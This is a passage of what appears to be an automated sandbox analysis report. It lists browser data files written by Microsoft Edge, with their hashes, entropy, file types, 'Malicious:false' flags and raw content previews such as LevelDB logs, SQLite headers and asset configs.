                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):336
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.061854932513341
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L4+q2P923oH+Tcwt9Eh1tIFUt8OLoXZmw+OLMruVkwO923oH+Tcwt9Eh15LJ:78+v4Yeb9Eh16FUt8OQ/+OgyV5LYeb9O
                                                                                                                                                                                                                                                                                              MD5:638257C205953519306B9B89E8F7668C
                                                                                                                                                                                                                                                                                              SHA1:6FBEF733EACE7A138FE227E054AB62ECD15F9BF0
                                                                                                                                                                                                                                                                                              SHA-256:EA776AA59B8A9E66F4BB96C1075DCD3F83BE8661998947AA9FF6B1A7E5712FF0
                                                                                                                                                                                                                                                                                              SHA-512:22C4F1CD4EBE1FA41719BDF257B5277D334AAA0CD4941E9C6AFA543BD5C540A98E31BE9E9321E739F4F6D57188CB24401178D1DE65E39D40C503593B55CEE57F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:24.884 20dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/10-12:40:24.888 20dc Recovering log #3.2024/12/10-12:40:24.894 20dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):336
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.061854932513341
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:7L4+q2P923oH+Tcwt9Eh1tIFUt8OLoXZmw+OLMruVkwO923oH+Tcwt9Eh15LJ:78+v4Yeb9Eh16FUt8OQ/+OgyV5LYeb9O
                                                                                                                                                                                                                                                                                              MD5:638257C205953519306B9B89E8F7668C
                                                                                                                                                                                                                                                                                              SHA1:6FBEF733EACE7A138FE227E054AB62ECD15F9BF0
                                                                                                                                                                                                                                                                                              SHA-256:EA776AA59B8A9E66F4BB96C1075DCD3F83BE8661998947AA9FF6B1A7E5712FF0
                                                                                                                                                                                                                                                                                              SHA-512:22C4F1CD4EBE1FA41719BDF257B5277D334AAA0CD4941E9C6AFA543BD5C540A98E31BE9E9321E739F4F6D57188CB24401178D1DE65E39D40C503593B55CEE57F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:24.884 20dc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/10-12:40:24.888 20dc Recovering log #3.2024/12/10-12:40:24.894 20dc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Collections\collectionsSQLite

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 34, database pages 18, cookie 0x19, schema 4, UTF-8, version-valid-for 34
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):73728
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.4947385728088827
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:96:xR94jweGq2L4H7pgNPdQyoDbel9myJrDVb4:f94ZBS4FgNPdPl9myRDVb4
                                                                                                                                                                                                                                                                                              MD5:29C9AF42D59BA452C914D337F83778D8
                                                                                                                                                                                                                                                                                              SHA1:0D4075E73B0189BD28D6968499DCFDE5975116CB
                                                                                                                                                                                                                                                                                              SHA-256:DFDAE22D17235546DAF4200A5920C46B10E0885D9A0BE747D3DE14F432817613
                                                                                                                                                                                                                                                                                              SHA-512:DB03C53D1CC2AE5E1E7882437730454AC27842FE5211A6DBDBBB5131EB0D607DB5D2F26EADB08CD9BAD90FD93D6E04A2C27361FE5BD1B510467D2E9BAEF90FBE
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..."..................................................................."..j....................0...{...h.6.~.%...U........................................................................................................................................................................................................................................................................................................................................................................G...##..Utablecollectionscollections.CREATE TABLE collections ( id LONGVARCHAR PRIMARY KEY, date_created REAL NOT NULL, date_modified REAL NOT NULL, title LONGVARCHAR NOT NULL, position INTEGER NOT NULL, is_syncable INTEGER DEFAULT 1, suggestion_url LONGVARCHAR, suggestion_dismissed INTEGER, suggestion_type INTEGER, thumbnail BLOB, is_custom_thumbnail INTEGER NOT NULL DEFAULT 0, tag LONGVARCHAR, thumbnail_url LONGVARCHAR, is_marked_for_deletion INTEGER)..........tableitemsitems.CREATE TABLE items

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DIPS

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.43508159006069336
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBI:TouQq3qh7z3bY2LNW9WMcUvB
                                                                                                                                                                                                                                                                                              MD5:F5237AED0F897E7619A94843845A3EC3
                                                                                                                                                                                                                                                                                              SHA1:A0C752C9C28A753CFB051AACE2ADA78A6D1288C3
                                                                                                                                                                                                                                                                                              SHA-256:D4463972AD7B1582F05C8E17074CE863D45CA625C2C672DB0D37F3AF4C7ACE42
                                                                                                                                                                                                                                                                                              SHA-512:D3C9718794E455D415D8EDF23B576E0A70356B8D71B8DD374D25B8065FEF608E114E13395B4B54462739882A141F4DBE00E3A370D6E4160504428A849CC893A3
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\DashTrackerDatabase

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):10240
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                              MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                              SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                              SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                              SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):634858
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.015691041468973
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:EfC7zTsosGXbkcnRXFrshHk0rZkYVTeV89XYr3UHNboOqQnd+Nf3nXXodHUeWEv9:Ef4E9cnRXFQK0rZkF8dKOMi0pXiHRX0q
                                                                                                                                                                                                                                                                                              MD5:F788AA50AF1940237D392739DD2F53B1
                                                                                                                                                                                                                                                                                              SHA1:7B6C68524813D2072F517195D737CF487FD74F42
                                                                                                                                                                                                                                                                                              SHA-256:68AEAA7D72793EA6446A5470D4FA057EE6B796ACC7254FB7CAC39728624ED1A7
                                                                                                                                                                                                                                                                                              SHA-512:3014E93C02E4CAB07926A38B7B6AAB89409AE5212C00A103C4F0DB1921DFED20659913DF6AB7BBF71381277C36524014BF467E61A59A48EC405B5236618AB298
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1l+Vc.................BLOOM_FILTER:..&{"numberOfHashFunctions":8,"shiftBase":7,"bloomFilterArraySize":3757764,"primeBases":[5381,5381,5381,5381],"supportedDomains":"FooHhxhbZru6kGIiP/Bhi1iMyyibrdC7FZ0qO+TcCcU6js0cQkxRJ/gfWlEW1aw/rm5ABm+aO1jwklVAS1ggZRJ9W1z8Hk2p0+/GIrP0BokzC9EFOLLYWaUcAXr0IjRl6cVJdHuRVD2tZd5vncH65m9sR1gUk/5kvw0+zxZfPDZ0DsHYwhnAIgZ7GPetaMX01RwPM6c9pgg7oBOwjz4BEQgEUkGmNo13+sCFt+ScXyXld1+EXCdE4SSBdAInjT+jF037vrJ6sb0Spo28djAJUgWyDFBQ1IhXUjXjsai9j6aCMcH2qfoXbNZwqG0djcP43vgomhm1AXUaKyuCXd1tOVpMJ7XqsVI2fS1LGQlnKGvBYGLANmiF086OCFA42ajy/BFRA9nzox5QggWZZBFABF0a1CLnrMKeZkIWlX4/gNU89JEiEswpL+xWUE8XTTZg0TPzPuB7AiR4xX97XHrLaxtKw54XLhM8W21PylQpjXMbZFUP699eYKAkWCqmmQhUR+0BSBy6NbViy81At96NBSQUDjQXjncLaDaSyG1sUxgKTwSfg5Cflr6HTZmNyTERQVZeIzcOdA7PTnEQZIgLtATmv4fDyH5N5/NKHHa02cQ+cVtvELaMxt7wYyp5kfK8W2dttRskQwuLCEPQ67KaeXE1sRzeLI+WJiAImKEYUS8lFSsglewUb1YcdhNzlIRgvwE3yhmCdOA3vQyaijYErox7S6xUxTWEYe0d1XTDgiwxhB16Dm0shiSuEsretNs0V2rskwbNBoAoROYJ4lZUu6LHX7PfZI1fgTQ

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000004.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):142
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.0002375389471485
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:5JE38E28xp4m3rscUSWOUJOX1Om4lXlf+nETPxpK2x7L8V0jnBFUOfWcF:XE38D8xSEsI/UG1Ojl9+n0PxEWO0jnBT
                                                                                                                                                                                                                                                                                              MD5:54C204431D5F796DD6A085F3BC8C34CC
                                                                                                                                                                                                                                                                                              SHA1:6B52797A4FB826EF7C8A1FD30AAEED358D36CB4D
                                                                                                                                                                                                                                                                                              SHA-256:BBDBD4DF8AA707218DF1AD0D719852F1D975C50B9B8A656A6D33047B36E92390
                                                                                                                                                                                                                                                                                              SHA-512:508422424B83E80107067AF1CDA7A60B239A9D93D2ED0DC8FF142F1776B53EE1F8BFE004C57C3B8261912CF4DB78167CCA6FDD4B289B86E0F2ABE43554888F29
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:....9................BLOOM_FILTER_EXPIRY_TIME:.1733938835.377072.+C+G................BLOOM_FILTER_LAST_MODIFIED:.Tue, 10 Dec 2024 13:15:31 GMT

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000005.ldb

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):634833
                                                                                                                                                                                                                                                                                              Entropy (8bit):6.015012816241871
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12288:EfC7cT5osGxbkHnRLFryhHV0rZUYVTKV8sXYl3UHNbooqQnd+E339XX7dH5eWEvx:Ef4oVHnRLFO/0rZUb8QWOoi04XhHAXa2
                                                                                                                                                                                                                                                                                              MD5:7A043B499C88417DAA2A334856FFB224
                                                                                                                                                                                                                                                                                              SHA1:CA277F06887073307841CA94AE3172FA575D60CD
                                                                                                                                                                                                                                                                                              SHA-256:C30C453876F0C4E8DB1960CBE0280044183C9D7ED9D5D661F3E691391DB86CC1
                                                                                                                                                                                                                                                                                              SHA-512:7BA5690EF819CAF93417708ED9A2675BB5A4FFA4944B76FEAF58D91B98C402918069FE4358B17C36664C7CD672CA80C06325B015959573F7F649B0F26F2CA19A
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:....&BLOOM_FILTER:........{"numberOfHashFunctions":8,"shiftBase":7,"bloomFilterArraySize":3757764,"primeBases":[5381,5381,5381,5381],"supportedDomains":"FooHhxhbZru6kGIiP/Bhi1iMyyibrdC7FZ0qO+TcCcU6js0cQkxRJ/gfWlEW1aw/rm5ABm+aO1jwklVAS1ggZRJ9W1z8Hk2p0+/GIrP0BokzC9EFOLLYWaUcAXr0IjRl6cVJdHuRVD2tZd5vncH65m9sR1gUk/5kvw0+zxZfPDZ0DsHYwhnAIgZ7GPetaMX01RwPM6c9pgg7oBOwjz4BEQgEUkGmNo13+sCFt+ScXyXld1+EXCdE4SSBdAInjT+jF037vrJ6sb0Spo28djAJUgWyDFBQ1IhXUjXjsai9j6aCMcH2qfoXbNZwqG0djcP43vgomhm1AXUaKyuCXd1tOVpMJ7XqsVI2fS1LGQlnKGvBYGLANmiF086OCFA42ajy/BFRA9nzox5QggWZZBFABF0a1CLnrMKeZkIWlX4/gNU89JEiEswpL+xWUE8XTTZg0TPzPuB7AiR4xX97XHrLaxtKw54XLhM8W21PylQpjXMbZFUP699eYKAkWCqmmQhUR+0BSBy6NbViy81At96NBSQUDjQXjncLaDaSyG1sUxgKTwSfg5Cflr6HTZmNyTERQVZeIzcOdA7PTnEQZIgLtATmv4fDyH5N5/NKHHa02cQ+cVtvELaMxt7wYyp5kfK8W2dttRskQwuLCEPQ67KaeXE1sRzeLI+WJiAImKEYUS8lFSsglewUb1YcdhNzlIRgvwE3yhmCdOA3vQyaijYErox7S6xUxTWEYe0d1XTDgiwxhB16Dm0shiSuEsretNs0V2rskwbNBoAoROYJ4lZUu6LHX7PfZI1fgTQM9b5ynwn8RuiV+AUFhhp5TmE+7IntErw0HqkBRSrhIgl

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.209254492968682
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:7AWQ+v4Yebn9GFUt8OArW/+OA1NV5LYebn95Z9pTSf0TXXfHKOXBXh:7L4Yeb9ig8OyWOLYeb9zLnTXfXBXh
                                                                                                                                                                                                                                                                                              MD5:611CE369EBDEC542582DD41294142374
                                                                                                                                                                                                                                                                                              SHA1:2BF3F0223782AEDB77D6AFF4BB0FF1C2B7E81698
                                                                                                                                                                                                                                                                                              SHA-256:C8FB5008FC63DCD4546FF1A8095E03E9E152ED8ACC7ED196B810A5A78DAC5087
                                                                                                                                                                                                                                                                                              SHA-512:6572855A0EE801225C453143D0F6D508CF526BA820D91BD1AC4095A938E8236C363EBFE7C966F27D1E5F0527EFC8A626CA65EA350D49C8764285BD7142A1D78E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.066 1d5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/10-12:40:19.067 1d5c Recovering log #3.2024/12/10-12:40:19.068 1d5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/12/10-12:40:35.405 1d08 Level-0 table #5: started.2024/12/10-12:40:35.444 1d08 Level-0 table #5: 634833 bytes OK.2024/12/10-12:40:35.445 1d08 Delete type=0 #3.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\LOG.old (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):512
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.209254492968682
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:7AWQ+v4Yebn9GFUt8OArW/+OA1NV5LYebn95Z9pTSf0TXXfHKOXBXh:7L4Yeb9ig8OyWOLYeb9zLnTXfXBXh
                                                                                                                                                                                                                                                                                              MD5:611CE369EBDEC542582DD41294142374
                                                                                                                                                                                                                                                                                              SHA1:2BF3F0223782AEDB77D6AFF4BB0FF1C2B7E81698
                                                                                                                                                                                                                                                                                              SHA-256:C8FB5008FC63DCD4546FF1A8095E03E9E152ED8ACC7ED196B810A5A78DAC5087
                                                                                                                                                                                                                                                                                              SHA-512:6572855A0EE801225C453143D0F6D508CF526BA820D91BD1AC4095A938E8236C363EBFE7C966F27D1E5F0527EFC8A626CA65EA350D49C8764285BD7142A1D78E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:2024/12/10-12:40:19.066 1d5c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.2024/12/10-12:40:19.067 1d5c Recovering log #3.2024/12/10-12:40:19.068 1d5c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/000003.log .2024/12/10-12:40:35.405 1d08 Level-0 table #5: started.2024/12/10-12:40:35.444 1d08 Level-0 table #5: 634833 bytes OK.2024/12/10-12:40:35.445 1d08 Delete type=0 #3.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\MANIFEST-000001

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):103
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.248480538985685
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:scoBAIxQRDKIVjGIOhinx6+qTxFxN3erkEtl:scoBY7jZNxDqTxFDkHl
                                                                                                                                                                                                                                                                                              MD5:42E7C651FA9CFE891D084F7A327ED9AF
                                                                                                                                                                                                                                                                                              SHA1:BF44DA5B3F89998DC693EE624C75DB1A56BFFF49
                                                                                                                                                                                                                                                                                              SHA-256:D3AF6DD512ADB5AAAB05A3B4A54908614D20103A03A61AF90F8409176FFDFF93
                                                                                                                                                                                                                                                                                              SHA-512:52CE8419D90C9836B270F53BC3B636D7EF158FCD3681B19517103D9240D2ADDC1F84293563F2FF5E7AB39A68A8FE0E4DD9860FDD04C120E89A7753CD385CE90C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:.|.."....leveldb.BytewiseComparator......@.p:7...............&.BLOOM_FILTER:.........DB_VERSION........

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                                                                                                              Entropy (8bit):0.6144491545247914
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:TLapR+DDNzWjJ0npnyXKUO8+jDfpN3LmL:TO8D4jJ/6Up+0
                                                                                                                                                                                                                                                                                              MD5:76F5FEE04D9CF02AE8F3AB8453D4B375
                                                                                                                                                                                                                                                                                              SHA1:6E0A98C9D3AFF855C13876AC2AF3D31BB1B2FF4C
                                                                                                                                                                                                                                                                                              SHA-256:1DA92FF064A7FBC83B2F687FA4D5501BF3561CCB7E2FF9E0C9A07DCB5955D994
                                                                                                                                                                                                                                                                                              SHA-512:F28EB05677CD53D6FF1C550BF7500BC244E052823CCE05420A8A94D4F8465271E6E9C3785FCB5221E43C32FC1A71D1C22BEBC93444FB111F4AD1A9D03F21F680
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                              MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                              SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                              SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                              SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):375520
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.354097648058685
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6144:tA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:tFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                              MD5:EA35BC6F0056D6DF6151240238A02A53
                                                                                                                                                                                                                                                                                              SHA1:10D60E721C531C5CFDB345B106D697CA585824ED
                                                                                                                                                                                                                                                                                              SHA-256:75B7776ADFEB62BA0E38E8EF21656BFEBA0B84B11A6162A83960690A2DC7B88C
                                                                                                                                                                                                                                                                                              SHA-512:157475CA32C7EE7E2DCCFDEF6743DE71F7EA330311F22F250163262C0DCC24EB9E12E4E291801EC43BF9597DBDFF8B52429C3FBEFFE08EC655A0B4D5B7372296
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:...m.................DB_VERSION.1..c&q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13378326029106703..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
